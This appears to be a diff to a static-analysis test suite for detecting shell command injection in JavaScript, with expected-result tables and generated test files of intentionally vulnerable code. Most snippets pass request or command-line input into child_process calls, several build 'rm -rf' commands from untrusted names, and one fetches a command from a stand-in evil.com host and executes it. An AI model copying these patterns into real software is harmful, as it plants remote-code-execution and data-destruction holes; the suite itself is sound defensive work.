| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:18:22:18:23 | [] |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:14 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:19 | files2.sort |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | files2.sort(sort) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:33 | files2. ... forEach |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | files3 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:18 | files3 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:23 | files3.push |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:25:20:37 | '<li>' + file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:34:20:37 | file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:21 | files3 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:26 | files3.join |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | files3.join('') |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:18 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:29:22:29:23 | [] |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:14 | files1 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:22 | files1.forEach |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:18 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:23 | files2.push |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | format(files2) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:35:29:35:34 | files2 |
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:30:14:30 | v |
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:33:22:33 | v |
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:33:23:33 | v |
@@ -223,6 +354,28 @@
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category |
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:60 | 'SELECT ... rams.id |
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:58 | 'SELECT ... rams.id |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote |
| SqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:29:46:29:60 | req.params.path |
| SqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:33:42:33:56 | req.params.name |
| SqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:37:43:37:57 | req.params.name |
@@ -293,6 +446,26 @@
| TaintedPathAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:27 | req.params.name |
| TaintedPathAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:28:52:30 | key |
| TaintedPathAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote |
| TaintedPathAtmConfig | autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | path.re ... /g, '') |
| TaintedPathAtmConfig | autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | path.re ... /g, '') |
| TaintedPathAtmConfig | autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | path.re ... /g, '') |

1
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/ExtractEndpointDataInference.ql
View File

@@ -19,6 +19,7 @@ private import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjecti
private import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
private import experimental.adaptivethreatmodeling.XssATM as XssAtm
private import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
private import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
query predicate isSinkCandidateForQuery(
AtmConfig::AtmConfig queryConfig, JS::DataFlow::PathNode sink

5093
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/ExtractEndpointDataTraining.expected
View File

File diff suppressed because it is too large Load Diff

1
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/FilteredTruePositives.expected
View File

@@ -30,3 +30,4 @@ xssThroughDomFilteredTruePositives
| autogenerated/Xss/DomBasedXss/tst.js:316:35:316:42 | location | not a direct argument to a likely external library call or a heuristic sink (xss) |
| autogenerated/Xss/DomBasedXss/typeahead.js:10:16:10:18 | loc | not a direct argument to a likely external library call or a heuristic sink (xss) |
| autogenerated/Xss/DomBasedXss/typeahead.js:25:18:25:20 | val | not a direct argument to a likely external library call or a heuristic sink (xss) |
shellCommandInjectionFromEnvironmentAtmFilteredTruePositives

12
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/FilteredTruePositives.ql
View File

@@ -16,11 +16,13 @@ import semmle.javascript.security.dataflow.NosqlInjectionCustomizations
import semmle.javascript.security.dataflow.SqlInjectionCustomizations
import semmle.javascript.security.dataflow.TaintedPathCustomizations
import semmle.javascript.security.dataflow.DomBasedXssCustomizations
import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentCustomizations
import experimental.adaptivethreatmodeling.NosqlInjectionATM as NosqlInjectionAtm
import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjectionAtm
import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
import experimental.adaptivethreatmodeling.XssATM as XssAtm
import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
query predicate nosqlFilteredTruePositives(DataFlow::Node endpoint, string reason) {
endpoint instanceof NosqlInjection::Sink and
@@ -51,3 +53,13 @@ query predicate xssThroughDomFilteredTruePositives(DataFlow::Node endpoint, stri
reason = any(XssThroughDomAtm::XssThroughDomAtmConfig cfg).getAReasonSinkExcluded(endpoint) and
reason != "argument to modeled function"
}
query predicate shellCommandInjectionFromEnvironmentAtmFilteredTruePositives(
DataFlow::Node endpoint, string reason
) {
endpoint instanceof ShellCommandInjectionFromEnvironment::Sink and
reason =
any(ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig cfg)
.getAReasonSinkExcluded(endpoint) and
reason != "argument to modeled function"
}

95
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js generated Normal file
View File

@@ -0,0 +1,95 @@
var cp = require("child_process"),
http = require('http'),
url = require('url');
var server = http.createServer(function(req, res) {
let cmd = url.parse(req.url, true).query.path;
cp.exec("foo"); // OK
cp.execSync("foo"); // OK
cp.execFile("foo"); // OK
cp.execFileSync("foo"); // OK
cp.spawn("foo"); // OK
cp.spawnSync("foo"); // OK
cp.fork("foo"); // OK
cp.exec(cmd); // NOT OK
cp.execSync(cmd); // NOT OK
cp.execFile(cmd); // NOT OK
cp.execFileSync(cmd); // NOT OK
cp.spawn(cmd); // NOT OK
cp.spawnSync(cmd); // NOT OK
cp.fork(cmd); // NOT OK
cp.exec("foo" + cmd + "bar"); // NOT OK
// These are technically NOT OK, but they are more likely as false positives
cp.exec("foo", {shell: cmd}); // OK
cp.exec("foo", {env: {PATH: cmd}}); // OK
cp.exec("foo", {cwd: cmd}); // OK
cp.exec("foo", {uid: cmd}); // OK
cp.exec("foo", {gid: cmd}); // OK
let sh, flag;
if (process.platform == 'win32')
sh = 'cmd.exe', flag = '/c';
else
sh = '/bin/sh', flag = '-c';
cp.spawn(sh, [ flag, cmd ]); // NOT OK
let args = [];
args[0] = "-c";
args[1] = cmd; // NOT OK
cp.execFile("/bin/bash", args);
let args = [];
args[0] = "-c";
args[1] = cmd; // NOT OK
run("sh", args);
let args = [];
args[0] = `-` + "c";
args[1] = cmd; // NOT OK
cp.execFile(`/bin` + "/bash", args);
cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // NOT OK
cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // NOT OK
let myArgs = [];
myArgs.push(`-` + "c");
myArgs.push(cmd);
cp.execFile(`/bin` + "/bash", args); // NOT OK - but no support for `[].push()` for indirect arguments [INCONSISTENCY]
});
function run(cmd, args) {
cp.spawn(cmd, args); // OK - the alert happens where `args` is build.
}
var util = require("util")
http.createServer(function(req, res) {
let cmd = url.parse(req.url, true).query.path;
util.promisify(cp.exec)(cmd); // NOT OK
});
const webpackDevServer = require('webpack-dev-server');
new webpackDevServer(compiler, {
before: function (app) {
app.use(function (req, res, next) {
cp.exec(req.query.fileName); // NOT OK
require("my-sub-lib").foo(req.query.fileName); // calls lib/subLib/index.js#foo
});
}
});
import Router from "koa-router";
const router = new Router();
router.get("/ping/:host", async (ctx) => {
cp.exec("ping " + ctx.params.host); // NOT OK
});

21
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js generated Normal file
View File

@@ -0,0 +1,21 @@
const cp = require('child_process'),
http = require('http'),
url = require('url');
function getShell() {
if (process.platform === 'win32') {
return { cmd: 'cmd', arg: '/C' }
} else {
return { cmd: 'sh', arg: '-c' }
}
}
function execSh(command, options) {
var shell = getShell()
return cp.spawn(shell.cmd, [shell.arg, command], options) // BAD
}
http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
execSh(cmd);
});

16
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js generated Normal file
View File

@@ -0,0 +1,16 @@
const cp = require('child_process'),
http = require('http'),
url = require('url');
function getShell() {
return "sh";
}
function execSh(command, options) {
return cp.spawn(getShell(), ["-c", command], options) // BAD
};
http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
execSh(cmd);
});

20
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js generated Normal file
View File

@@ -0,0 +1,20 @@
var exec = require('child_process').exec;
function asyncEach(arr, iterator) {
var i = 0;
(function iterate() {
iterator(arr[i++], function () {
if (i < arr.length)
process.nextTick(iterate);
});
})();
}
function execEach(commands) {
asyncEach(commands, (command) => exec(command)); // NOT OK
};
require('http').createServer(function(req, res) {
let cmd = require('url').parse(req.url, true).query.path;
execEach([cmd]);
});

63
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js generated Normal file
View File

@@ -0,0 +1,63 @@
var express = require('express');
var multer = require('multer');
var upload = multer({ dest: 'uploads/' });
var app = express();
var exec = require("child_process").exec;
app.post('/profile', upload.single('avatar'), function (req, res, next) {
exec("touch " + req.file.originalname); // NOT OK
});
app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) {
req.files.forEach(file => {
exec("touch " + file.originalname); // NOT OK
})
});
var http = require('http');
var Busboy = require('busboy');
http.createServer(function (req, res) {
var busboy = new Busboy({ headers: req.headers });
busboy.on('file', function (fieldname, file, filename, encoding, mimetype) {
exec("touch " + filename); // NOT OK
});
req.pipe(busboy);
}).listen(8000);
const formidable = require('formidable');
app.post('/api/upload', (req, res, next) => {
let form = formidable({ multiples: true });
form.parse(req, (err, fields, files) => {
exec("touch " + fields.name); // NOT OK
});
let form2 = new formidable.IncomingForm();
form2.parse(req, (err, fields, files) => {
exec("touch " + fields.name); // NOT OK
});
});
var multiparty = require('multiparty');
var http = require('http');
http.createServer(function (req, res) {
// parse a file upload
var form = new multiparty.Form();
form.parse(req, function (err, fields, files) {
exec("touch " + fields.name); // NOT OK
});
var form2 = new multiparty.Form();
form2.on('part', function (part) { // / file / field
exec("touch " + part.filename); // NOT OK
});
form2.parse(req);
}).listen(8080);

35
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js generated Normal file
View File

@@ -0,0 +1,35 @@
var http = require("http"),
url = require("url");
var server = http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
require("cross-spawn").sync(cmd); // NOT OK
require("execa").shell(cmd); // NOT OK
require("execa").shellSync(cmd); // NOT OK
require("execa").stdout(cmd); // NOT OK
require("execa").stderr(cmd); // NOT OK
require("execa").sync(cmd); // NOT OK
require("cross-spawn")(cmd); // NOT OK
require("cross-spawn-async")(cmd); // NOT OK
require("exec")(cmd); // NOT OK
require("exec-async")(cmd); // NOT OK
require("execa")(cmd); // NOT OK
require("remote-exec")(target, cmd); // NOT OK
const ssh2 = require("ssh2");
new ssh2().exec(cmd); // NOT OK
new ssh2.Client().exec(cmd); // NOT OK
const SSH2Stream = require("ssh2-streams").SSH2Stream;
new SSH2Stream().exec(false, cmd); // NOT OK
require("execa").node(cmd); // NOT OK
require("foreground-child")(cmd); // NOT OK
const opener = require("opener");
opener("http://github.com/" + url.parse(req.url, true).query.user); // OK
opener("http://github.com", { command: cmd }); // NOT OK
});

8
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js generated Normal file
View File

@@ -0,0 +1,8 @@
let https = require("https"),
cp = require("child_process");
https.get("https://evil.com/getCommand", res =>
res.on("data", command => {
cp.execSync(command);
})
);

147
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js generated Normal file
View File

@@ -0,0 +1,147 @@
var cp = require("child_process");
(function() {
cp.exec(process.argv); // NOT OK (just weird)
cp.exec(process.argv[0]); // OK
cp.exec("cmd.sh " + process.argv[0]); // OK
cp.exec("cmd.sh " + process.argv[1]); // OK
cp.exec("cmd.sh " + process.argv[2]); // NOT OK
var args = process.argv.slice(2);
cp.execSync(args[0]); // NOT OK
cp.execSync("cmd.sh " + args[0]); // NOT OK
var fewerArgs = args.slice(1);
cp.execSync(fewerArgs[0]); // NOT OK
cp.execSync("cmd.sh " + fewerArgs[0]); // NOT OK
var arg0 = fewerArgs[0];
cp.execSync(arg0); // NOT OK
cp.execSync("cmd.sh " + arg0); // NOT OK
});
(function() {
const args = process.argv.slice(2);
const script = path.join(packageDir, 'app', 'index.js');
cp.execSync(`node ${script} ${args[0]} --option"`); // NOT OK
cp.execSync(`node ${script} ${args.join(' ')} --option"`); // NOT OK
});
cp.exec("cmd.sh " + require("get-them-args")().foo); // NOT OK
cp.exec("cmd.sh " + require("minimist")().foo); // OK - no args provided.
cp.exec("cmd.sh " + require("yargs").argv.foo); // NOT OK
cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK
(function () {
var args = require('yargs') // eslint-disable-line
.command('serve [port]', 'start the server', (yargs) => { })
.option('verbose', { foo: "bar" })
.argv
cp.exec("cmd.sh " + args); // NOT OK
cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // NOT OK
});
(function () {
const {
argv: {
...args
},
} = require('yargs')
.usage('Usage: foo bar')
.command();
cp.exec("cmd.sh " + args); // NOT OK
var tainted1 = require('yargs').argv;
var tainted2 = require('yargs').parse()
const {taint1: {...taint1rest},taint2: {...taint2rest}} = {
taint1: tainted1,
taint2: tainted2
}
cp.exec("cmd.sh " + taint1rest); // NOT OK - has flow from tainted1
cp.exec("cmd.sh " + taint2rest); // NOT OK - has flow from tianted2
var {...taint3} = require('yargs').argv;
cp.exec("cmd.sh " + taint3); // NOT OK
var [...taint4] = require('yargs').argv;
cp.exec("cmd.sh " + taint4); // NOT OK
});
(function () {
const argv = process.argv.slice(2);
var minimist = require("minimist");
cp.exec("cmd.sh " + minimist(argv).foo); // NOT OK
var subarg = require('subarg');
cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // NOT OK
var yargsParser = require('yargs-parser');
cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // NOT OK
import args from 'args'
var flags = args.parse(process.argv);
cp.exec("cmd.sh " + flags.foo); // NOT OK
var flags = require('arg')({...spec});
cp.exec("cmd.sh " + flags.foo); // NOT OK
})
(function () {
const { ArgumentParser } = require('argparse');
const parser = new ArgumentParser({description: 'Argparse example'});
parser.add_argument('-f', '--foo', { help: 'foo bar' });
cp.exec("cmd.sh " + parser.parse_args().foo); // NOT OK
});
(function () {
const commandLineArgs = require('command-line-args');
const options = commandLineArgs(optionDefinitions);
cp.exec("cmd.sh " + options.foo); // NOT OK
});
(function () {
const meow = require('meow');
const cli = meow(`helpstring`, {flags: {...flags}});
cp.exec("cmd.sh " + cli.input[0]); // NOT OK
});
(function () {
var dashdash = require('dashdash');
var opts = dashdash.parse({options: options});
cp.exec("cmd.sh " + opts.foo); // NOT OK
var parser = dashdash.createParser({options: options});
var opts = parser.parse();
cp.exec("cmd.sh " + opts.foo); // NOT OK
});
(function () {
const { program } = require('commander');
program.version('0.0.1');
cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK
cp.exec("cmd.sh " + program.pizzaType); // NOT OK
});
(function () {
const { Command } = require('commander');
const program = new Command();
program.version('0.0.1');
cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK
cp.exec("cmd.sh " + program.pizzaType); // NOT OK
});

53
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js generated Normal file
View File

@@ -0,0 +1,53 @@
const express = require("express");
const app = express();
const { execFile } = require("child_process");
app.get("/", (req, res) => {
const remote = req.query.remote;
execFile("git", ["ls-remote", remote]); // NOT OK
execFile("git", ["fetch", remote]); // NOT OK
indirect("git", ["ls-remote", remote]); // NOT OK
const myArgs = req.query.args;
execFile("git", myArgs); // NOT OK
if (remote.startsWith("--")) {
execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here.
} else {
execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's not an option
}
if (remote.startsWith("git@")) {
execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's a git URL
} else {
execFile("git", ["ls-remote", remote, "HEAD"]); // NOT OK - unknown starting string
}
execFile("git", req.query.args); // NOT OK - unknown args
execFile("git", ["add", req.query.args]); // OK - git add is not a command that can be used to execute arbitrary code
execFile("git", ["add", req.query.remote].concat([otherargs()])); // OK - git add is not a command that can be used to execute arbitrary code
execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs)); // NOT OK - but not found [INCONSISTENCY]. It's hard to track through concat.
execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // OK
// hg
execFile("hg", ["clone", req.query.remote]); // NOT OK
execFile("hg", ["whatever", req.query.remote]); // NOT OK - `--config=alias.whatever=touch pwned`
execFile("hg", req.query.args); // NOT OK - unknown args
execFile("hg", ["clone", "--", req.query.remote]); // OK
});
function indirect(cmd, args) {
execFile(cmd, args); // - OK - ish, the vulnerability not reported here
}
app.listen(3000, () => console.log("Example app listening on port 3000!"));

13
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js generated Normal file
View File

@@ -0,0 +1,13 @@
var cp = require('child_process'),
path = require('path'),
execa = require("execa");
(function() {
cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); // GOOD
cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // BAD
execa.shell('rm -rf ' + path.join(__dirname, "temp")); // NOT OK
execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // NOT OK
const safe = "\"" + path.join(__dirname, "temp") + "\"";
execa.shellSync('rm -rf ' + safe); // OK
});

7
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js generated Normal file
View File

@@ -0,0 +1,7 @@
// is imported from lib.js
const cp = require("child_process");
module.exports.thisMethodIsImported = function (name) {
cp.exec("rm -rf " + name); // NOT OK
}

547
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js generated Normal file
View File

@@ -0,0 +1,547 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK
cp.execFile(name, [name]); // OK
cp.execFile(name, name); // OK
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // NOT OK
}
module.exports.foo.bar = function (name) {
cp.exec("rm -rf " + name); // NOT OK
}
function cla() { }
cla.prototype.method = function (name) {
cp.exec("rm -rf " + name); // NOT OK
}
module.exports = new cla();
function cla2() { }
cla2.prototype.method = function (name) {
cp.exec("rm -rf " + name); // NOT OK
}
module.exports.bla = new cla2();
module.exports.lib2 = require("./lib2.js")
class Cla3 {
constructor(name) {
cp.exec("rm -rf " + name); // NOT OK
}
static foo(name) {
cp.exec("rm -rf " + name); // NOT OK
}
bar(name) {
cp.exec("rm -rf " + name); // NOT OK
cp.exec("rm -rf " + notASource); // OK
}
}
module.exports.cla3 = Cla3;
module.exports.mz = function (name) {
require("mz/child_process").exec("rm -rf " + name); // NOT OK.
}
module.exports.flow = function (name) {
